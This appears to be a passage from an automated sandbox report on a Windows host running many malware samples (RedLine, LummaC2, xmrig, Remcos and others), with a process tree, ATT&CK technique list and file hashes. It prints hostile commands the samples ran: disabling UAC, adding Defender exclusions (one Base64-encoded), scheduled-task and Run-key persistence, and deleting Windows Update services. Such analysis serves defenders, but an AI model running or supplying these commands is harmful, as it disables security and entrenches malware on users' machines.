  "C:\Users\Admin\AppData\Local\Temp\a\redline.exe"
  2⤵
  PID:6996
- C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe"
  2⤵
  PID:4528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:8044
- C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
  2⤵
  PID:8004
- C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
    3⤵
    PID:6232
  - - C:\Baldi\Baldi.exe
      C:\Baldi\Baldi.exe
      4⤵
      PID:3404
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:5328
  - - C:\Baldi\DisableUAC.exe
      C:\Baldi\DisableUAC.exe
      4⤵
      PID:3364
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EE5E.tmp\EE5F.bat C:\Baldi\DisableUAC.exe"
        5⤵
        
        PID:3684
      - C:\Windows\system32\reg.exe
        
        reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:8540
      - C:\Windows\system32\shutdown.exe
        
        shutdown -r -t 1 -c "BALDI EVIL..."
        6⤵
        
        PID:8412
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:7940
- C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe"
  2⤵
  PID:8168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:2220
- C:\Users\Admin\AppData\Local\Temp\a\a02.exe
  "C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
  2⤵
  PID:2940
- - C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    3⤵
    PID:7536
- C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
  2⤵
  PID:6736
- - C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
    3⤵
    PID:2924
- C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe"
  2⤵
  PID:6992
- - C:\Users\Admin\AppData\Local\Temp\stlr.exe
    "C:\Users\Admin\AppData\Local\Temp\stlr.exe"
    3⤵
    PID:7880
- - C:\Users\Admin\AppData\Roaming\nig_guy1.exe
    "C:\Users\Admin\AppData\Roaming\nig_guy1.exe"
    3⤵
    PID:6280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcgBxACMAPgA="
    3⤵
    PID:7668
- C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
  2⤵
  PID:6104
- C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
  2⤵
  PID:6444
- - C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
    3⤵
    PID:9052
- C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
  2⤵
  PID:6316
- - C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
    3⤵
    PID:2564
- C:\Users\Admin\AppData\Local\Temp\a\work.exe
  "C:\Users\Admin\AppData\Local\Temp\a\work.exe"
  2⤵
  PID:7156
- C:\Users\Admin\AppData\Local\Temp\a\updater.exe
  "C:\Users\Admin\AppData\Local\Temp\a\updater.exe"
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" vai.vbe
    3⤵
    PID:816
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c lbvcefvmm.pif pvanphvj.exe
      4⤵
      PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ipconfig /release
      4⤵
      PID:1796
- C:\Users\Admin\AppData\Local\Temp\a\LummaC2_2023-05-26_18-46.exe
  "C:\Users\Admin\AppData\Local\Temp\a\LummaC2_2023-05-26_18-46.exe"
  2⤵
  PID:6220
- C:\Users\Admin\AppData\Local\Temp\a\1232.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
  2⤵
  PID:8476
- C:\Users\Admin\AppData\Local\Temp\a\Sniepriu.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Sniepriu.exe"
  2⤵
  PID:8900
- C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
  2⤵
  PID:9088
- C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe"
  2⤵
  PID:7748
- C:\Users\Admin\AppData\Local\Temp\a\build9.exe
  "C:\Users\Admin\AppData\Local\Temp\a\build9.exe"
  2⤵
  PID:7192

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:4244

C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 00000000000B006A /startuptips
1⤵
PID:4200

C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
1⤵
PID:4248

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:1452

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5176

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:6432

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:6476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:3848

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6340
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:7208
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:2912
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8724
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:3064

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:4512
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2944
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:7348
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8512
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:8784
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:3868
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:7828
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:1560
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:2580
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:6400
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:7936

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:6880

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:2408

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:3352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:7368

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ada055 /state1:0x41c64e6d
1⤵
PID:7592

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2288 -s 7608
1⤵
- Program crash
PID:5492

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2288 -s 4188
1⤵
- Program crash
PID:216

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
PID:7492

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:8808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4364

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe

Filesize
1.3MB

MD5
ebf39794ba6132055e6114d47bc18941

SHA1
214dead1bd716c58709c39a8180551b737048785

SHA256
8af777d0f92cef2d9040a634527c3753669235589c23129f09855ad0ebe10c6f

SHA512
01e7521af569050acc473fd13c8dd9a781370bd7cefcbc7e953e66ab930f407e9791c9fdb2ab4f368579f16bebb7368bebd2a475351a42d9e2092da0835bffbb

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com

Filesize
308KB

MD5
ee9f9565049005c3fc1dfd32db706ef8

SHA1
1761611775aa66b437e8e79ae2e7cdb295501bf7

SHA256
41fe567d55eb7815d15fe5f3408a902f5743a42b2d6b58a6eac7455a06e52d28

SHA512
466eb8863f2c91178f197fd560a4b1829946f2910b94f75cc345522ec60b1d0827707628a50627f3ae5f441f239d0f22330c5983ac8f04c2efaea87153ad8a1b

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\ProgramData\GitLibedll\YKNH.exe

Filesize
166.5MB

MD5
1a7bb2dff89e68c024c981a1f2da9db9

SHA1
4b0ee896d6ed74f40e36722aa0db1617f26369b2

SHA256
63728ced9cc04195931ecb54931e826fb5397d105de0f814e45d47eebb0748eb

SHA512
f811e6f283c8a98b0ea5e76731a8aebf99c8049ae04627d0dd9afd98669dce8c3265d23a63a8e6c9e7fa200260dc20cd65a95ded47109c9f3162a8482fa19ef4

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
214B

MD5
e8eb3a25ec1f83e0ae81c50a8a855694

SHA1
fe9e2a9cbcc2f08a674aca6e301e089898464eed

SHA256
3cab9890c252086ad0ae81190577fa5fa7fefaa87e7cbb1cd640b92da971c250

SHA512
a4dd3a482c2a8a98c8909b560cd4d230e2599095efe8e37b1909cb097ebeaf25164162cbb8cfaa7565c99cbec26995a794e4153f334b9f6ed4720855ec7375f8

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
522B

MD5
cbade96b69908b74bcb7d4ab69612f61

SHA1
5a928067b66d1f3ad0016372fd0c4bf0769ed879

SHA256
cfd314d4ffde7b06cec75f462a8e430519ecf54ea8cf0068f1654b83217a50fd

SHA512
24634e7d00944b205dbcdf3d9362cc4bacc627d558710d272bc871ace484e00675df93d777d119c50158a6fe3ba3deb6e277603ca8b782288475619cb0e5716b

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
748B

MD5
aac5707cf9a40a88ebf5a07d58aee2e9

SHA1
66b8b06725825b449919f37ca0fdfee37bac3ff5

SHA256
dd001dfd9e7fb339593523595df958c873b24d80b2313dd59de31466f736e511

SHA512
484c1082ba252de2b2fdd84f4a5b42c506d55ed0d9d036c99abee2955ce604c495b174d79dd04bbd35fa2f339454476509f3f8231767ea4ab0787252f180a2e5

Download Submit
C:\ProgramData\remcos\logs.dat

Filesize
1KB

MD5
6056e90c7eed4c0df401c22305c32eb6

SHA1
d35aee440496bb8de5f99b7416253acb0afed5f6

SHA256
41e69abe236f367fc13720b7590ef906d261deb83acf4cc5065585ce93d58e68

SHA512
41355182df999d49f1ff81f2660dcb0d6bf1324f05b012179e95c41319eaafc62760bbe51a29189bf34fe77cb21cf2b6df2fd44f3ae6145980796e419140478a

Download Submit
C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe

Filesize
151KB

MD5
f693e2f2661b6e5824ccd29e5ba58bb6

SHA1
9ad9460ca70e2c603c693c3ea97e29b9b06d3d57

SHA256
f8fd7b7eabb7b70e3f5a13bf8526eb620522a3c0aac6caf05b4db83d13e1e625

SHA512
81c44bb23c94b54bac01c9c7a56a4eb40a7d1bda35194fff5790882aa2cf06a99fa509b9493a0eb48574a318694480cbd3c4a739d8dbbeb16a6e20653a2e7855

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\A.exe.log

Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

Filesize
226B

MD5
957779c42144282d8cd83192b8fbc7cf

SHA1
de83d08d2cca06b9ff3d1ef239d6b60b705d25fe

SHA256
0d7ca7ba65e2b465e4878e324ceab8f8981f5ec06dcf5bc32559a4467a9c7d51

SHA512
f1549c61b4f2906d13b2aabb74772c2bc826cd42373d7bb6c48cbb125d5aa2ec17617e6b5e67e8aae3bb5790cc831cdba48a45008ed01df4fba8be448cce39fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oceanzx.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
473e37a9478645438faa392130962165

SHA1
1945d60b3c42328b13b03b7a9e21827caf5ddd34

SHA256
9b1fabf828efdc67d36672c671575388916c07d8a0f2b15ec2c5cf0f637a25b5

SHA512
d182f024e00ad48d20f258859aef7f56c2e3ac8cb6743c0bbb86f4e224cf21bf85c8d04d8dabb64ef6f8e6d1f4110352ccce8482313b2c4e20f473be29b9fdd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe

Filesize
205KB

MD5
3a66a27b79651f7c45a136a08a44a571

SHA1
2c5ef7ea40a7f24c559818e25a166cacb9b0c6fa

SHA256
2e229f0a4035b58e6c24c519e93f56a9aad7af92405c8604e5e8cb1d23174f43

SHA512
26478e3bace13460bc2ef257eb9032c6c6f21f015b14e9c698c52f7208b9edf8c70edfaaebe08671dc675862df6a29238e14636a27e2ee06523453c6208da5d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe

Filesize
4.2MB

MD5
1d5c8c5f65ece8bd6c534c2a4dab103f

SHA1
cb982786f558208767bc171a4c3b718b0db0ce3f

SHA256
8308179514d386fba1356aa4459f46f925d4a5b9a6f36733154d183c0780ac93

SHA512
92d814721e2a699ca50dc2a8da642d9f405c09efb7731103624eaede318b46f4803e8501aa8437b70040a8da10b97b81d64023c0111b03339a5c96f7c2c665ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\setup.exe

Filesize
365KB

MD5
d96a975ad533ddad6c1f07f03dc6f519

SHA1
4a0a9e2a723c7bcde21c62e23006329f5c0d2144

SHA256
eca00bf18be6fbab8750a2530402b780a77385eaf3b995036309f360a97fa602

SHA512
5d7231dc1b8bcecdf888eeeca72844df4402d8d14f4fbc23e7d4b54fd0017fa0ebae5cb5bcd9fd39fa737656b27d237d53ea8f5ab842f40edc29383cae2ae47f

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
a64a886a695ed5fb9273e73241fec2f7

SHA1
363244ca05027c5beb938562df5b525a2428b405

SHA256
563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

SHA512
122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1439100.exe

Filesize
378KB

MD5
afbf47ffe96c6343f1d41a174a613f0c

SHA1
82de11a4027cbd681450a6feff4687484e8cca11

SHA256
337bc9bd743716ec99f5ea71a32a199af498f6d4dc58d05799250d5c144c5710

SHA512
68b7b5431b04ee8d6f4db2527cc8b18e07e39aff16228251a9e6648009f9f783f60ad3d5acb70956c1027783cf2c4e1338fcdb666a06ff71317d1eb7682173c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x1439100.exe

Filesize
378KB

MD5
afbf47ffe96c6343f1d41a174a613f0c

SHA1
82de11a4027cbd681450a6feff4687484e8cca11

SHA256
337bc9bd743716ec99f5ea71a32a199af498f6d4dc58d05799250d5c144c5710

SHA512
68b7b5431b04ee8d6f4db2527cc8b18e07e39aff16228251a9e6648009f9f783f60ad3d5acb70956c1027783cf2c4e1338fcdb666a06ff71317d1eb7682173c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2690896.exe

Filesize
206KB

MD5
301b02c8daed37850a343df4012b056d

SHA1
4da64cc7e204f7fa80551c31f106ecca1ed1fa59

SHA256
d07186dccc54f2415abb42d710b88e6f195569575383e45aa030582a45dbf2d9

SHA512
00fe1ce3798d4b7b53032f1a1d56e399660d041daf0e58c7025534bc583074a4da98f1b97950bacb3127262b1c494147bbe31a686c454feaf7b5c5612e087f69

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x2690896.exe

Filesize
206KB

MD5
301b02c8daed37850a343df4012b056d

SHA1
4da64cc7e204f7fa80551c31f106ecca1ed1fa59

SHA256
d07186dccc54f2415abb42d710b88e6f195569575383e45aa030582a45dbf2d9

SHA512
00fe1ce3798d4b7b53032f1a1d56e399660d041daf0e58c7025534bc583074a4da98f1b97950bacb3127262b1c494147bbe31a686c454feaf7b5c5612e087f69

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\y3042868.exe

Filesize
524KB

MD5
075ceff626dd3e220837a48b6d5d5a62

SHA1
abe0a13dc102b8e7e070454a34250da0f43ab1c3

SHA256
f67fc64ab02621e7d6513c1a906cbade9660339a425f6d1c7c9cd94ed3328884

SHA512
d87c6716ff2c389dd8a19ac09288a67c684180f92ab90ab444633cc4e9179997aa7ab271f25bbb37da8a518737416066b16f3a531cc96464ea4d8caa1f3652c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\y3042868.exe

Filesize
524KB

MD5
075ceff626dd3e220837a48b6d5d5a62

SHA1
abe0a13dc102b8e7e070454a34250da0f43ab1c3

SHA256
f67fc64ab02621e7d6513c1a906cbade9660339a425f6d1c7c9cd94ed3328884

SHA512
d87c6716ff2c389dd8a19ac09288a67c684180f92ab90ab444633cc4e9179997aa7ab271f25bbb37da8a518737416066b16f3a531cc96464ea4d8caa1f3652c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0109069.exe

Filesize
172KB

MD5
1f3a5a32052ce9f9ec8dac0bbb976153

SHA1
9f7ad844980b726928bbbd220d5872ed2baf684f

SHA256
ddcc413d5f7c9c93386cb349f6cc0c2ffaf828f7a8fddf1cab9343dd69fe341e

SHA512
530790b6212ded2c4cbebe44249bf64a7a15a07b3561183c026c9bace91dee3c733ecbd1c16b88f960576f542cb5bd381035bbbb06acd9c4c2b031555dca9ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0109069.exe

Filesize
172KB

MD5
1f3a5a32052ce9f9ec8dac0bbb976153

SHA1
9f7ad844980b726928bbbd220d5872ed2baf684f

SHA256
ddcc413d5f7c9c93386cb349f6cc0c2ffaf828f7a8fddf1cab9343dd69fe341e

SHA512
530790b6212ded2c4cbebe44249bf64a7a15a07b3561183c026c9bace91dee3c733ecbd1c16b88f960576f542cb5bd381035bbbb06acd9c4c2b031555dca9ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8418428.exe

Filesize
352KB

MD5
a9abe8cb276b2083a85cc20a1d3f44df

SHA1
2f4d744886d4e3eba9549f8bd76fcb8bb48b7df5

SHA256
56456f1d17fa01f6ea25355061a9fed7b54a1d5379cf0c5b1dcba8e617b604da

SHA512
3b0a6fc29485978a9797efb67b3a7df7de48e82b19819f7e3545aec6f369801ff94fb093d1569f39193a6ab120e8d8ae1eb42d4c923406e7e903a67f02d6b4a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y8418428.exe

Filesize
352KB

MD5
a9abe8cb276b2083a85cc20a1d3f44df

SHA1
2f4d744886d4e3eba9549f8bd76fcb8bb48b7df5

SHA256
56456f1d17fa01f6ea25355061a9fed7b54a1d5379cf0c5b1dcba8e617b604da

SHA512
3b0a6fc29485978a9797efb67b3a7df7de48e82b19819f7e3545aec6f369801ff94fb093d1569f39193a6ab120e8d8ae1eb42d4c923406e7e903a67f02d6b4a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l2840142.exe

Filesize
172KB

MD5
5fac8a5fec9308604212ffe1f26e1bbe

SHA1
8f6bb9f84cae9cb5d261d740007652c488e827d9

SHA256
81d1dd1e4c6a9abc8394df643aaecea54b9fead67f4cce6d7bc251c7ff1e7071

SHA512
21d8a353c3f29d8c136562dd9fd7af9bf8e7ad4bd10f823136df2c5e1c8a57d1923e9a3819e4fd0a8df212d5f5c396a9eabf8d52b64cc23b7cfe23b6d832ed83

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\l2840142.exe

Filesize
172KB

MD5
5fac8a5fec9308604212ffe1f26e1bbe

SHA1
8f6bb9f84cae9cb5d261d740007652c488e827d9

SHA256
81d1dd1e4c6a9abc8394df643aaecea54b9fead67f4cce6d7bc251c7ff1e7071

SHA512
21d8a353c3f29d8c136562dd9fd7af9bf8e7ad4bd10f823136df2c5e1c8a57d1923e9a3819e4fd0a8df212d5f5c396a9eabf8d52b64cc23b7cfe23b6d832ed83

